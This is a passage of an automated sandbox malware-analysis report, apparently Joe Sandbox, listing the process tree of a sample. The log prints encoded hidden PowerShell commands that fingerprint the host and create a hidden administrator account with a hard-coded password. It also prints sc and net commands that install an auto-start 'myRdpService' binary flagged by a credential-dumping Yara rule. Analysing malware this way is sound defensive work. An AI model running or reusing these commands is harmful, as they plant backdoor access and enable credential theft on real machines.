                                                                                                                          Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
                                                                                                                          Imagebase:0x7ff6b7220000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:22
                                                                                                                          Start time:04:58:55
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:23
                                                                                                                          Start time:04:58:55
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:24
                                                                                                                          Start time:04:58:55
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc query myRdpService
                                                                                                                          Imagebase:0x7ff754550000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:25
                                                                                                                          Start time:04:58:55
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
                                                                                                                          Imagebase:0x7ff6b7220000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:26
                                                                                                                          Start time:04:58:55
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:27
                                                                                                                          Start time:04:59:37
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"cmd.exe" /c sc query myRdpService
                                                                                                                          Imagebase:0x7ff614290000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:28
                                                                                                                          Start time:04:59:37
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:29
                                                                                                                          Start time:04:59:38
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc query myRdpService
                                                                                                                          Imagebase:0x7ff754550000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:30
                                                                                                                          Start time:04:59:38
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"cmd.exe" /c sc stop "myRdpService"
                                                                                                                          Imagebase:0x7ff614290000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:31
                                                                                                                          Start time:04:59:38
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:32
                                                                                                                          Start time:04:59:38
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc stop "myRdpService"
                                                                                                                          Imagebase:0x7ff754550000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:33
                                                                                                                          Start time:04:59:39
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"cmd.exe" /c sc query myRdpService
                                                                                                                          Imagebase:0x7ff614290000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:34
                                                                                                                          Start time:04:59:39
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:35
                                                                                                                          Start time:04:59:39
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc query myRdpService
                                                                                                                          Imagebase:0x7ff754550000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:36
                                                                                                                          Start time:04:59:46
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
                                                                                                                          Imagebase:0x7ff614290000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:37
                                                                                                                          Start time:04:59:46
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:38
                                                                                                                          Start time:04:59:46
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:sc delete "myRdpService"
                                                                                                                          Imagebase:0x7ff754550000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:39
                                                                                                                          Start time:04:59:46
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
                                                                                                                          Imagebase:0x7ff754550000
                                                                                                                          File size:72'192 bytes
                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:40
                                                                                                                          Start time:04:59:46
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:net start "myRdpService"
                                                                                                                          Imagebase:0x7ff7a1c00000
                                                                                                                          File size:59'904 bytes
                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:41
                                                                                                                          Start time:04:59:46
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\net1 start "myRdpService"
                                                                                                                          Imagebase:0x7ff6d9190000
                                                                                                                          File size:183'808 bytes
                                                                                                                          MD5 hash:BA0BCCC6029FBBE6D8B41197F252742F
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:42
                                                                                                                          Start time:04:59:46
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\Temp\myRdpService.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Temp\myRdpService.exe cakoi10
                                                                                                                          Imagebase:0x7ff6b8660000
                                                                                                                          File size:9'427'456 bytes
                                                                                                                          MD5 hash:F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: hacktool_windows_moyix_creddump, Description: creddump is a python tool to extract credentials and secrets from Windows registry hives., Source: 0000002A.00000002.4144371245.00007FF6B8B66000.00000004.00000001.01000000.0000000A.sdmp, Author: @mimeframe
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:43
                                                                                                                          Start time:04:59:58
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
                                                                                                                          Imagebase:0x7ff6b7220000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:44
                                                                                                                          Start time:04:59:58
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFCCF21F20C Relevance: .4, Instructions: 445COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dcf11946aa341467d4e4560afdccd1cc486d8f0b1b5f3777791e8ce9e0fe7acb
                                                                                                                            • Instruction ID: 6f72e6f06cfe2ecd9b220d5828d788ff41484c85ec0861d0218af90590fa0e55
                                                                                                                            • Opcode Fuzzy Hash: dcf11946aa341467d4e4560afdccd1cc486d8f0b1b5f3777791e8ce9e0fe7acb
                                                                                                                            • Instruction Fuzzy Hash: EEE18430A08A8D8FEBA8DF28D8557E977E1FF54310F04826EE85DC7291DB34A945CB91
                                                                                                                            Function 00007FFCCF21FFBC Relevance: .4, Instructions: 428COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 661a911c91b56862f33e9114eaf49f29cd66b49016f1600adc80184e2edbb251
                                                                                                                            • Instruction ID: bd7948672bd834d7b8b57a08bafe8b160631716c53de249fe5756282c54a058d
                                                                                                                            • Opcode Fuzzy Hash: 661a911c91b56862f33e9114eaf49f29cd66b49016f1600adc80184e2edbb251
                                                                                                                            • Instruction Fuzzy Hash: F9E17130A08A8D8FEBA8DF28C8557E977E1FB54310F14822EE84DC7295DF74A945CB91
                                                                                                                            Function 00007FFCCF21FBCC Relevance: .3, Instructions: 304COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 56c4943b4979923db97a436d81eb6ac6b88bbf160842e27a954ab6c6655f7ba0
                                                                                                                            • Instruction ID: 3bce8057a0ae38fd65a2050de7d9b1139af345000f1d620aac2f8a867e538806
                                                                                                                            • Opcode Fuzzy Hash: 56c4943b4979923db97a436d81eb6ac6b88bbf160842e27a954ab6c6655f7ba0
                                                                                                                            • Instruction Fuzzy Hash: EBA18130608A4D8FEBA8DF28D8557F937E1FB58310F10822EE85DC7291DA34A945CBD6
                                                                                                                            Function 00007FFCCF2E2754 Relevance: .3, Instructions: 302COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3143186162.00007FFCCF2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF2E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf2e0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9599713e4aec186bdce04c5c5db2520b65677228823096871905612d619268aa
                                                                                                                            • Instruction ID: 0b442e3c4c277db32df3527b2d5313239a7668fefcfa6b8bc83d36063954ae82
                                                                                                                            • Opcode Fuzzy Hash: 9599713e4aec186bdce04c5c5db2520b65677228823096871905612d619268aa
                                                                                                                            • Instruction Fuzzy Hash: B3811122E0DA9D4FEB99DB2C58646B577D1EF95311B2811BBD04EC71D2DE189C01C3B1
                                                                                                                            Function 00007FFCCF21B50C Relevance: .2, Instructions: 159COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1dc68eab747c97328da01e8caf44f6baa4f434a1b7a02a47ed18531512276738
                                                                                                                            • Instruction ID: d28a1c1f5d47631aa2c6ff163d450e857161a7a509fb057547df8b58bd8cee19
                                                                                                                            • Opcode Fuzzy Hash: 1dc68eab747c97328da01e8caf44f6baa4f434a1b7a02a47ed18531512276738
                                                                                                                            • Instruction Fuzzy Hash: 1221803190CB8C8FDB19DF689855BE9BFF0EF66320F0481AFD089C3562D6646809CB51
                                                                                                                            Function 00007FFCCF222C84 Relevance: .1, Instructions: 124COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a224de3ea8e13b00a0d25ed7dc0c4ff04b8be50a2feb5259c63d355bcb909a47
                                                                                                                            • Instruction ID: a100226a55aab104b272f9f1f801021a522749c5f5c4e66ab6c60673305dab25
                                                                                                                            • Opcode Fuzzy Hash: a224de3ea8e13b00a0d25ed7dc0c4ff04b8be50a2feb5259c63d355bcb909a47
                                                                                                                            • Instruction Fuzzy Hash: 1731C27191CA4C8FEB18DF4CD8466B97BE0FBA8721F00422FE449D3291DA71A855CBD2
                                                                                                                            Function 00007FFCCF21B658 Relevance: .1, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a6fffad7ca9e7535fd7414cd7e2fa7e3739b34f25da1e17196454ead7bb596a3
                                                                                                                            • Instruction ID: e9bbcac617e40510259ba097b7cd44b4eb08567b4651b172fe0aba075471624f
                                                                                                                            • Opcode Fuzzy Hash: a6fffad7ca9e7535fd7414cd7e2fa7e3739b34f25da1e17196454ead7bb596a3
                                                                                                                            • Instruction Fuzzy Hash: 9231093190C64C8FEB58DF98D8467E97BF0EB66320F04416FD049C3192DA756816CB91
                                                                                                                            Function 00007FFCCF223018 Relevance: .1, Instructions: 102COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
